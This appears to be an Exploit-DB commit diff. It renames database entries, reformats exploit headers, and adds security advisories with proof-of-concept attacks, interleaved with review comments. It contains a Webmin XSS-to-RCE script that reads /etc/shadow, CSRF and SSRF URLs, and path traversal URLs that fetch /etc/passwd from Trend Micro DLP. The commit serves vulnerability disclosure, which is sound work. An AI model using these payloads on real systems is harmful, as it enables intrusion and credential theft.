DB: 2017-10-17

3 new exploits

Microsoft Office - HtmlDlgHelper Class Memory Corruption (MS10-071)
Microsoft Office - 'HtmlDlgHelper' Class Memory Corruption (MS10-071)

Xcode OpenBase 9.1.5 (OSX) - (Root File Create) Privilege Escalation
Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation (Root File Create)

Linux modutils 2.3.9 - modprobe Arbitrary Command Execution
Linux modutils 2.3.9 - 'modprobe' Arbitrary Command Execution

Jan Hubicka Koules 1.4 - Svgalib Buffer Overflow
Jan Hubicka Koules 1.4 - 'Svgalib' Buffer Overflow

Internet Security Systems 3.6 - ZWDeleteFile Function Arbitrary File Deletion
Internet Security Systems 3.6 - 'ZWDeleteFile()' Arbitrary File Deletion

Muhammad A. Muquit wwwcount 2.3 - Count.cgi Buffer Overflow
Muhammad A. Muquit wwwcount 2.3 - 'Count.cgi' Buffer Overflow

Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module - SQL Injection
Asterisk 'asterisk-addons' 1.2.7/1.4.3 - CDR_ADDON_MYSQL Module SQL Injection
Comdev One Admin 4.1 - Adminfoot.php Remote Code Execution
Simplog 0.9.3.1 - comments.php SQL Injection
Comdev One Admin 4.1 - 'Adminfoot.php' Remote Code Execution
Simplog 0.9.3.1 - 'comments.php' SQL Injection

Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal
AlienVault Unified Security Management (USM) 5.4.2 - Cross-Site Request Forgery
Webmin 1.850 - Multiple Vulnerabilities
Offensive Security 2017-10-17 05:01:30 +00:00
parent 51c5257c7f
commit 461226bd00
15 changed files with 365 additions and 78 deletions

@ -1756,7 +1756,7 @@ id,file,description,date,author,platform,type,port
15259,platforms/windows/dos/15259.txt,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow",2010-10-15,"Luigi Auriemma",windows,dos,0
15260,platforms/windows/dos/15260.txt,"Rocket Software UniData 7.2.7.3806 - Denial of Service",2010-10-15,"Luigi Auriemma",windows,dos,0
15261,platforms/multiple/dos/15261.txt,"IBM solidDB 6.5.0.3 - Denial of Service",2010-10-15,"Luigi Auriemma",multiple,dos,0
15262,platforms/windows/dos/15262.txt,"Microsoft Office - HtmlDlgHelper Class Memory Corruption (MS10-071)",2010-10-16,"Core Security",windows,dos,0
15262,platforms/windows/dos/15262.txt,"Microsoft Office - 'HtmlDlgHelper' Class Memory Corruption (MS10-071)",2010-10-16,"Core Security",windows,dos,0
15267,platforms/windows/dos/15267.py,"Novel eDirectory DHost Console 8.8 SP3 - Local Overwrite (SEH)",2010-10-17,d0lc3,windows,dos,0
15273,platforms/multiple/dos/15273.txt,"Opera 10.63 - SVG Animation Element Denial of Service",2010-10-17,fla,multiple,dos,0
15283,platforms/windows/dos/15283.txt,"Hanso Converter 1.4.0 - '.ogg' Denial of Service",2010-10-19,anT!-Tr0J4n,windows,dos,0
@ -6067,7 +6067,7 @@ id,file,description,date,author,platform,type,port
2543,platforms/solaris/local/2543.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",solaris,local,0
2565,platforms/osx/local/2565.pl,"Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation",2006-10-15,"Kevin Finisterre",osx,local,0
2569,platforms/solaris/local/2569.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)",2006-10-16,"Marco Ivaldi",solaris,local,0
2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - (Root File Create) Privilege Escalation",2006-10-16,"Kevin Finisterre",osx,local,0
2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation (Root File Create)",2006-10-16,"Kevin Finisterre",osx,local,0
2581,platforms/linux/local/2581.c,"Nvidia Graphics Driver 8774 - Local Buffer Overflow",2006-10-16,"Rapid7 Security",linux,local,0
2633,platforms/hp-ux/local/2633.c,"HP-UX 11i - 'swpackage' Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0
2634,platforms/hp-ux/local/2634.c,"HP-UX 11i - (swmodify) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0
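Review bot: the context line for 2634 still uses the parenthesised form "(swmodify)" while the neighbouring 2633 entry ('swpackage') and the renamed 2580 entry ("Privilege Escalation (Root File Create)") follow the quoted-name convention this commit is applying; normalising it to 'swmodify' in the same pass would keep the two HP-UX entries consistent.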
@ -7726,10 +7726,10 @@ id,file,description,date,author,platform,type,port
20396,platforms/hp-ux/local/20396.sh,"HP-UX 10.x/11.x - Aserver PATH",1998-10-18,Loneguard,hp-ux,local,0
40427,platforms/windows/local/40427.txt,"Iperius Remote 1.7.0 - Unquoted Service Path Privilege Escalation",2016-09-26,Tulpa,windows,local,0
20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent",2000-11-10,"Hugo Caye",windows,local,0
20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 - modprobe Arbitrary Command Execution",2000-11-12,"Michal Zalewski",linux,local,0
20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 - 'modprobe' Arbitrary Command Execution",2000-11-12,"Michal Zalewski",linux,local,0
20407,platforms/windows/local/20407.c,"NetcPlus SmartServer3 3.75 - Weak Encryption",2000-11-18,"Steven Alexander",windows,local,0
20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 - Weak Encryption",2000-11-18,"Steven Alexander",windows,local,0
20410,platforms/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 - Svgalib Buffer Overflow",2000-11-20,Synnergy.net,unix,local,0
20410,platforms/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 - 'Svgalib' Buffer Overflow",2000-11-20,Synnergy.net,unix,local,0
20411,platforms/linux/local/20411.c,"Oracle 8.x - cmctl Buffer Overflow",2000-11-20,anonymous,linux,local,0
41031,platforms/windows/local/41031.txt,"aSc Timetables 2017 - Buffer Overflow",2017-01-12,"Peter Baris",windows,local,0
20417,platforms/osx/local/20417.c,"Tunnelblick - Privilege Escalation (1)",2012-08-11,zx2c4,osx,local,0
@ -8419,7 +8419,7 @@ id,file,description,date,author,platform,type,port
28789,platforms/solaris/local/28789.sh,"Sun Solaris Netscape Portable Runtime API 4.6.1 - Privilege Escalation (2)",2006-10-24,"Marco Ivaldi",solaris,local,0
29213,platforms/windows/local/29213.pl,"Photodex ProShow Producer 5.0.3310 - Local Buffer Overflow (SEH)",2013-10-26,"Mike Czumak",windows,local,0
28806,platforms/linux/local/28806.txt,"davfs2 1.4.6/1.4.7 - Privilege Escalation",2013-10-08,"Lorenzo Cantoni",linux,local,0
28817,platforms/multiple/local/28817.txt,"Internet Security Systems 3.6 - ZWDeleteFile Function Arbitrary File Deletion",2006-10-16,"Matousec Transparent security",multiple,local,0
28817,platforms/multiple/local/28817.txt,"Internet Security Systems 3.6 - 'ZWDeleteFile()' Arbitrary File Deletion",2006-10-16,"Matousec Transparent security",multiple,local,0
28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow (SEH)",2013-10-14,metacom,windows,local,0
28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0
28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0
@ -11841,7 +11841,7 @@ id,file,description,date,author,platform,type,port
19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34 / Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,remote,0
40434,platforms/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,php,remote,0
19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1 & SCO Unixware 7.1.1 & SGI IRIX 5.3 & Sun Solaris 2.5.1 - Exploit",1997-11-24,anonymous,linux,remote,0
19105,platforms/linux/remote/19105.c,"Muhammad A. Muquit wwwcount 2.3 - Count.cgi Buffer Overflow",1997-10-16,"Razvan Dragomirescu",linux,remote,0
19105,platforms/linux/remote/19105.c,"Muhammad A. Muquit wwwcount 2.3 - 'Count.cgi' Buffer Overflow",1997-10-16,"Razvan Dragomirescu",linux,remote,0
19107,platforms/linux/remote/19107.c,"Netscape Messaging Server 3.55 & University of Washington imapd 10.234 - Buffer Overflow",1998-07-17,anonymous,linux,remote,0
19109,platforms/linux/remote/19109.c,"Qualcomm qpopper 2.4 - POP Server Buffer Overflow (1)",1998-06-27,"Seth McGann",linux,remote,0
19110,platforms/unix/remote/19110.c,"Qualcomm qpopper 2.4 - POP Server Buffer Overflow (2)",1998-06-27,"Miroslaw Grzybek",unix,remote,0
@ -14355,7 +14355,7 @@ id,file,description,date,author,platform,type,port
30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 - 'SIP From' HTML Injection",2007-10-09,"Radu State",hardware,remote,0
30652,platforms/hardware/remote/30652.txt,"Cisco IOS 12.3 - 'LPD' Remote Buffer Overflow",2007-10-10,"Andy Davis",hardware,remote,0
30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,hardware,remote,0
30677,platforms/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module - SQL Injection",2007-10-16,"Humberto J. Abdelnur",linux,remote,0
30677,platforms/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 - CDR_ADDON_MYSQL Module SQL Injection",2007-10-16,"Humberto J. Abdelnur",linux,remote,0
30678,platforms/multiple/remote/30678.java,"Nortel Networks UNIStim IP SoftPhone 2050 - RTCP Port Buffer Overflow",2007-10-18,"Cyrill Brunschwiler",multiple,remote,0
30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 - 'ierpplug.dll' ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,windows,remote,0
30711,platforms/linux/remote/30711.txt,"Shttp 0.0.x - Directory Traversal",2007-10-25,"Pete Foster",linux,remote,0
@ -17541,8 +17541,8 @@ id,file,description,date,author,platform,type,port
2568,platforms/php/webapps/2568.txt,"webSPELL 4.01.01 - 'getsquad' SQL Injection",2006-10-15,Kiba,php,webapps,0
2570,platforms/php/webapps/2570.txt,"OpenDock FullCore 4.4 - Remote File Inclusion",2006-10-16,Matdhule,php,webapps,0
2572,platforms/php/webapps/2572.txt,"Osprey 1.0 - 'GetRecord.php' Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0
2573,platforms/php/webapps/2573.php,"Comdev One Admin 4.1 - Adminfoot.php Remote Code Execution",2006-10-16,w4ck1ng,php,webapps,0
2574,platforms/php/webapps/2574.php,"Simplog 0.9.3.1 - comments.php SQL Injection",2006-10-16,w4ck1ng,php,webapps,0
2573,platforms/php/webapps/2573.php,"Comdev One Admin 4.1 - 'Adminfoot.php' Remote Code Execution",2006-10-16,w4ck1ng,php,webapps,0
2574,platforms/php/webapps/2574.php,"Simplog 0.9.3.1 - 'comments.php' SQL Injection",2006-10-16,w4ck1ng,php,webapps,0
2575,platforms/php/webapps/2575.php,"Boonex Dolphin 5.2 - 'index.php' Remote Code Execution",2006-10-16,w4ck1ng,php,webapps,0
2576,platforms/php/webapps/2576.txt,"Specimen Image Database - 'client.php' Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0
2577,platforms/php/webapps/2577.txt,"P-News 1.16 - Remote File Inclusion",2006-10-16,vegas78,php,webapps,0
@ -38674,6 +38674,7 @@ id,file,description,date,author,platform,type,port
42968,platforms/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,php,webapps,0
42971,platforms/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0
42972,platforms/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0
42975,platforms/linux/webapps/42975.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal",2017-10-11,"Leonardo Duarte",linux,webapps,0
42978,platforms/php/webapps/42978.txt,"OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting",2017-10-12,"Ishaq Mohammed",php,webapps,0
42979,platforms/php/webapps/42979.txt,"E-Sic Software livre CMS - 'q' Parameter SQL Injection",2017-10-12,"Guilherme Assmann",php,webapps,0
42980,platforms/php/webapps/42980.txt,"E-Sic Software livre CMS - Autentication Bypass",2017-10-12,"Elber Tavares",php,webapps,0
@ -38683,3 +38684,5 @@ id,file,description,date,author,platform,type,port
42985,platforms/php/webapps/42985.txt,"TYPO3 Extension Restler 1.7.0 - Local File Disclosure",2017-10-13,CrashBandicot,php,webapps,0
42986,platforms/hardware/webapps/42986.txt,"Dreambox Plugin BouquetEditor - Cross-Site Scripting",2017-10-12,"Thiago Sena",hardware,webapps,0
42987,platforms/php/webapps/42987.txt,"phpMyFAQ 2.9.8 - Cross-Site Scripting",2017-10-13,"Ishaq Mohammed",php,webapps,0
42988,platforms/php/webapps/42988.txt,"AlienVault Unified Security Management (USM) 5.4.2 - Cross-Site Request Forgery",2017-10-13,"Julien Ahrens",php,webapps,0
42989,platforms/cgi/webapps/42989.txt,"Webmin 1.850 - Multiple Vulnerabilities",2017-10-15,hyp3rlinx,cgi,webapps,0

@ -1,10 +1,9 @@
source : http://www.securityfocus.com/bid/1951/info
DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.
The script improperly validates user-supplied input, which allows the remote viewing of arbitrary files on the host which are readable by user 'nobody' or the webserver. Additionally, it has been reported that the dcforum.cgi script can be made to delete itself if the attacker attempts to read its source code using this method, effectively permitting a denial-of-service attack.
# source: http://www.securityfocus.com/bid/1951/info
#
# DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.
#
#The script improperly validates user-supplied input, which allows the remote viewing of arbitrary files on the host which are readable by user 'nobody' or the webserver. Additionally, it has been reported that the dcforum.cgi script can be made to delete itself if the attacker attempts to read its source code using this method, effectively permitting a denial-of-service attack.
#
#!/usr/bin/perl
# DC Forum Vulnerablitiy(Found In Versions From 1.0 - 6.0 According To
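Review bot: the `# source:` comment block is inserted above `#!/usr/bin/perl`, so the shebang is no longer on line 1 and the file will not run when executed directly (only via `perl <file>`); moving the shebang to the top and placing the header comment beneath it keeps the file executable. The same ordering appears in the HP-UX Aserver, modutils, asterisk-addons and BS.Player hunks further down this commit. The surviving header line also keeps the typo "Vulnerablitiy".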

platforms/cgi/webapps/42989.txt (executable file, 134 lines)

@ -0,0 +1,134 @@
[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3430
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WEBMIN-v1.850-REMOTE-COMMAND-EXECUTION.txt
[+] ISR: ApparitionSec
Vulnerability summary
The following advisory describes three (3) vulnerabilities found in Webmin version 1.850
Webmin “is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS,
file sharing and much more. Webmin removes the need to manually edit Unix configuration files like /etc/passwd, and lets you manage a system from
the console or remotely. See the standard modules page for a list of all the functions built into Webmin.”
The vulnerabilities found are:
XSS vulnerability that leads to Remote Code Execution
CSRF Schedule arbitrary commands
Server Side Request Forgery
Credit
An independent security researcher, hyp3rlinx, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
Vendor response
The vendor has released patches to address these vulnerabilities.
For more information: https://github.com/webmin/webmin/commit/0c58892732ee7610a7abba5507614366d382c9c9 and http://www.webmin.com/security.html
Vulnerability details
XSS vulnerability that leads to Remote Code Execution
Under Webmin menu Others/File Manager there is option to download a file from a remote server Download from remote URL.
By setting up a malicious server we can wait for file download request then send a XSS payload that will lead to Remote Code Execution.
Webmin echo back the File Download request status which we can trigger the XSS vulnerability and bypass this Referrer check by setting the
domain=webmin-victim-ip.
Proof of Concept
import socket
#===================================================
#Run this script and listen for file download from webmin
#Enter payload to execute RCE
#wait for webmin to connect and download file
#Vulnerability is in Menu/Others/File Manager
#issue is webmin echoes back status of the download
#by injecting XSS we bypass the Referer: check by assign
#domain to victims own IP, then execute our RCE
#-----------------------------------------------------------
#e.g.
#Download from remote URL
#http://x.x.x.x:10000/shell/index.cgi
#> whoami
#root
PORT=int(raw_input("[PORT]> ")) #port we listen on for file download requests
WEBMIN_IP=raw_input("[Webmin IP]> ") #victim
#Read /etc/shadow file
CMD=("/><script>document.domain='http://"+WEBMIN_IP+":10000/shell/index.cgi'</script>"+
"<form action='https://"+WEBMIN_IP+":10000/shell/index.cgi' method='POST' enctype='multipart/form-data'>"+
"<input type='hidden' name='cmd' value='cat /etc/shadow'><script>document.forms[0].submit()</script></form>")
s = socket.socket()
HOST = ''
s.bind((HOST, PORT))
s.listen(5)
print '\nwebmin file download 0day...'
while True:
conn, addr = s.accept()
conn.send(CMD+'\r\n')
print 'Connected!'
print s.recv(1024)
conn.close()
s.close()
CSRF Schedule arbitrary commands
User controlled input is not sufficiently sanitized, by sending GET request to create_job.cgi with the following parameter dir=/&cmd=ls
an attacker to execute arbitrary commands.
Proof of Concept
http://x.x.x.x:10000/at/create_job.cgi?user=root&day=31&month=7&year=2017&hour=2&min=00&dir=/&cmd=ls -lt&mail=0
Server Side Request Forgery
User controlled input is not sufficiently sanitized, by sending GET request to tunnel/link.cgi/http://VICTIM-IP:8000 an attacker can trigger
the vulnerability
Proof of Concept
http://x.x.x.x:10000/tunnel/link.cgi/http://VICTIM-IP:8000
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
====================
Would like to acknowledge Beyond Securitys SSD program for the help with co-ordination of this vulnerability.
More details can be found on their blog at:
https://blogs.securiteam.com/index.php/archives/3430
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
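Review bot: the "Disclosure Timeline:" heading has no entries beneath it, so the report, patch and publication dates are not recorded anywhere in the advisory; adding them, or dropping the heading, would make the file self-contained. The file is also committed with the executable bit set although it is a plain-text advisory, and the embedded Python PoC is Python 2 only (`raw_input`, `print` statements), which is worth stating in its header comment.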

@ -1,11 +1,11 @@
source : http://www.securityfocus.com/bid/1929/info
Aserver is a server program that ships with HP-UX versions 10.x and above that is used to interface client applications with the audio hardware. Because it talks to hardware, it is installed setuid root by default.
During normal execution, Aserver executes "ps" via the system() libcall, relying on the PATH environment variable to do so. As a result, a user can modify their PATH environment variable so that it includes an arbitrary program called 'ps' before executing Aserver. When Aserver is run with the -f argument, the offending system() function will be called and the attacker's version of ps will be executed as root.
This is a trivial root compromise.
# source: http://www.securityfocus.com/bid/1929/info
#
# Aserver is a server program that ships with HP-UX versions 10.x and above that is used to interface client applications with the audio hardware. Because it talks to hardware, it is installed setuid root by default.
#
# During normal execution, Aserver executes "ps" via the system() libcall, relying on the PATH environment variable to do so. As a result, a user can modify their PATH environment variable so that it includes an arbitrary program called 'ps' before executing Aserver. When Aserver is run with the -f argument, the offending system() function will be called and the attacker's version of ps will be executed as root.
#
# This is a trivial root compromise.
#
#!/bin/sh
#

@ -1,14 +1,15 @@
source : http://www.securityfocus.com/bid/1936/info
Modutils is a component of many linux systems that includes tools for using loadable kernel modules. One of these tools, modprobe, loads a set of modules that correspond to a provided "name" (passed at the command line) automatically. Modprobe version 2.3.9 and possibly others around it contain a vulnerability (present since March 12, 1999) that can lead to a local root compromise.
The problem has to do with modprobe using popen() to execute the "echo" program argumented with user input. Because popen() relies on /bin/sh to parse the command string and execute "echo", unescaped shell metacharacters can be included in user input to execute other commands.
Though modprobe is not installed setuid root, this vulnerability can be exploited to gain root access provided the target system is using kmod. Kmod is a kernel facility that automatically executes the program 'modprobe' when a module is requested via request_module().
One program that does this is the version of ping that ships with RedHat Linux 7.0. When a device is specified at the command-line that doesnt exist, request_module is called with the user-supplied arguments passed to the kernel. The kernel then takes the arguments and exec's modprobe with them. Arbitrary commands included in the argument for module name (device name to ping) are then executed when popen() is called as root.
Successful exploitation of this will yield root access for the attacker.
# source: http://www.securityfocus.com/bid/1936/info
#
# Modutils is a component of many linux systems that includes tools for using loadable kernel modules. One of these tools, modprobe, loads a set of modules that correspond to a provided "name" (passed at the command line) automatically. Modprobe version 2.3.9 and possibly others around it contain a vulnerability (present since March 12, 1999) that can lead to a local root compromise.
#
# The problem has to do with modprobe using popen() to execute the "echo" program argumented with user input. Because popen() relies on /bin/sh to parse the command string and execute "echo", unescaped shell metacharacters can be included in user input to execute other commands.
#
# Though modprobe is not installed setuid root, this vulnerability can be exploited to gain root access provided the target system is using kmod. Kmod is a kernel facility that automatically executes the program 'modprobe' when a module is requested via request_module().
#
# One program that does this is the version of ping that ships with RedHat Linux 7.0. When a device is specified at the command-line that doesnt exist, request_module is called with the user-supplied arguments passed to the kernel. The kernel then takes the arguments and exec's modprobe with them. Arbitrary commands included in the argument for module name (device name to ping) are then executed when popen() is called as root.
#
# Successful exploitation of this will yield root access for the attacker.
#
#!/bin/sh

@ -1,13 +1,15 @@
source: http://www.securityfocus.com/bid/26095/info
#source: http://www.securityfocus.com/bid/26095/info
#
#Asterisk 'asterisk-addons' package is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
#
#Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#
#This issue affects these versions:
#
#'asterisk-addons' prior to 1.2.8 when used with Asterisk Open Source 1.2.x
#'asterisk-addons' prior to 1.4.4 when used with Asterisk Open Source 1.4.x
Asterisk 'asterisk-addons' package is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects these versions:
'asterisk-addons' prior to 1.2.8 when used with Asterisk Open Source 1.2.x
'asterisk-addons' prior to 1.4.4 when used with Asterisk Open Source 1.4.x
#!/usr/bin/perl
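Review bot: the new header lines use `#source:` and `#Asterisk ...` with no space after the `#`, while every other file converted in this commit uses `# source:` and `# ` for the same block; matching that spacing keeps the headers greppable with one pattern.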

@ -0,0 +1,22 @@
# Exploit Title: Trend Micro Data Loss Prevention Virtual Appliance 5.2 Web Path Traversal
# Date: 10/11/2017
# Exploit Author: Leonardo Duarte
# Contact: http://twitter.com/etakdc
# Vendor Homepage: http://la.trendmicro.com/la/productos/data-loss-prevention/
# Version: 5.2
# Tested on: Debian 9
# Category: webapps
1. Description
A path traversal vulnerability that can be exploited to read files outside of the web root using encoded dot and slash characters
2. Proof of Concept
https://ip:8443/dsc/%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AFetc%C0%AFpasswd
https://ip:8443/dsc/%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AFbin%C0%AFash
https://ip/dsc/%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AFhome%C0%AFdgate%C0%AFiptables
Then the file will be visible
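Review bot: the description says only "encoded dot and slash characters", but the PoC URLs use the overlong two-byte UTF-8 forms `%C0%AE` ('.') and `%C0%AF` ('/'), which is the detail a fix or a detection rule has to target (reject or normalise overlong sequences before the path check); stating it explicitly would help readers. The third URL also omits the `:8443` port the first two use, and the "Date: 10/11/2017" header is ambiguous next to the `2017-10-11` recorded in files.csv.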

@ -1,8 +1,9 @@
source: http://www.securityfocus.com/bid/44727/info
PHP is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
# source: http://www.securityfocus.com/bid/44727/info
#
# PHP is prone to an information-disclosure vulnerability.
#
# Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
#
<?php
$b = "bbbbbbbbbbb";
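Review bot: the `# source:` header lines are placed before `<?php`, where PHP treats them as literal output rather than comments, so running the script prints the five header lines before anything else; putting the header inside the PHP block (`<?php` first, then `// source: ...`) avoids that.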

@ -62,7 +62,7 @@ $aname = explode( "><input type=text name=cname maxlength=64 value=\"",$data);
$bname = explode( "\">",$aname[1 ]);
$name = $bname[ 0];
$ahash = explode( "<textarea name=comment rows=10 cols=40 wrap=physical>",$data);
$bhash = explode( "&lt;/textarea&gt;",$ahash[1 ]);
$bhash = explode( "</textarea>",$ahash[1 ]);
$hash = $bhash[ 0];
if(strlen($hash) != 32){
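Review bot: the delimiter change is right: `explode("&lt;/textarea&gt;", ...)` can never match the raw `</textarea>` in the page that the preceding `explode("<textarea ...>", $data)` splits on, so `$bhash[0]` held the remainder of the page and `strlen($hash) != 32` always failed. A short comment above the call noting that the markup is matched unescaped would stop a later copy-edit from reintroducing the entity-encoded form.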

@ -1,10 +1,11 @@
source: http://www.securityfocus.com/bid/40364/info
OpenForum is prone to a vulnerability that may allow remote attackers to create arbitrary files on a vulnerable system.
Successful exploits will allow an attacker to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.
OpenForum 2.2 b005 is vulnerable; other versions may also be affected.
# source: http://www.securityfocus.com/bid/40364/info
#
# OpenForum is prone to a vulnerability that may allow remote attackers to create arbitrary files on a vulnerable system.
#
# Successful exploits will allow an attacker to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.
#
# OpenForum 2.2 b005 is vulnerable; other versions may also be affected.
#
#============================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #

@ -1,10 +1,11 @@
source: http://www.securityfocus.com/bid/52224/info
Traidnt Topics Viewer is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
Traidnt Topics Viewer 2.0 BETA 1 is vulnerable; other versions may also be affected.
# source: http://www.securityfocus.com/bid/52224/info
#
# Traidnt Topics Viewer is prone to a cross-site request-forgery vulnerability.
#
# Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
#
# Traidnt Topics Viewer 2.0 BETA 1 is vulnerable; other versions may also be affected.
#
<html>
<body onload="javascript:document.forms[0].submit()">
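Review bot: the `# source:` lines precede `<html>`, and `#` is not a comment marker in HTML, so a browser renders the six header lines as visible text above the auto-submitting form; an HTML comment (`<!-- source: ... -->`) carries the same provenance without changing what is displayed. The Jet 3.51 file at the end of this commit has the same issue above its `<HTML>` tag.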

platforms/php/webapps/42988.txt (executable file, 119 lines)

@ -0,0 +1,119 @@
1. ADVISORY INFORMATION
=======================
Product: AlienVault USM
Vendor URL: https://www.alienvault.com
Type: Cross-Site Request Forgery [CWE-253]
Date found: 2017-09-22
Date published: 2017-10-13
CVSSv3 Score: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)
CVE: CVE-2017-14956
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
AlienVault USM 5.4.2 (current)
older versions may be affected too.
4. INTRODUCTION
===============
AlienVault Unified Security Management (USM) is a comprehensive approach to
security monitoring, delivered in a unified platform. The USM platform includes
five essential security capabilities that provide resource-constrained
organizations with all the security essentials needed for effective threat
detection, incident response, and compliance, in a single pane of glass.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
AlienVault USM v5.4.2 offers authenticated users the functionality to generate
and afterwards export generated compliance reports via the script located at
"/ossim/report/wizard_email.php". Besides offering an export via a local file
download, the script does also offer the possibility to send out any report via
email to a given address (either in PDF or XLSX format).
An exemplary request to send the pre-defined report
"PCI_DSS_3_2__Vulnerability_Details" to the email address "email () example com"
looks like the following:
https://example.com/ossim/report/wizard_email.php?extra_data=1&name=UENJX0RTU18zXzJfX1Z1bG5lcmFiaWxpdHlfRGV0YWlscw==&format=email&pdf=true&email=email
() example com
The base64-encoded HTTP GET "name" parameter can be replaced with any other
of the approx. 240 pre-defined reports, that are shipped with AlienVault USM
since they do all have hardcoded identifiers, such as:
- Alarm_Report
- Ticket_Report
- Business_and_Compliance
- HIPAA_List_of_identified_ePHI_assets
- PCI_DSS_3_2_Database_Users_Added
- VulnerabilitiesReport
etc.
Since there is no anti-CSRF token protecting this functionality, it is
vulnerable to Cross-Site Request Forgery attacks. An exemplary exploit to send
the "PCI_DSS_3_2__Vulnerability_Details" report as a PDF-file to
"email () example com" could look like the following:
<html>
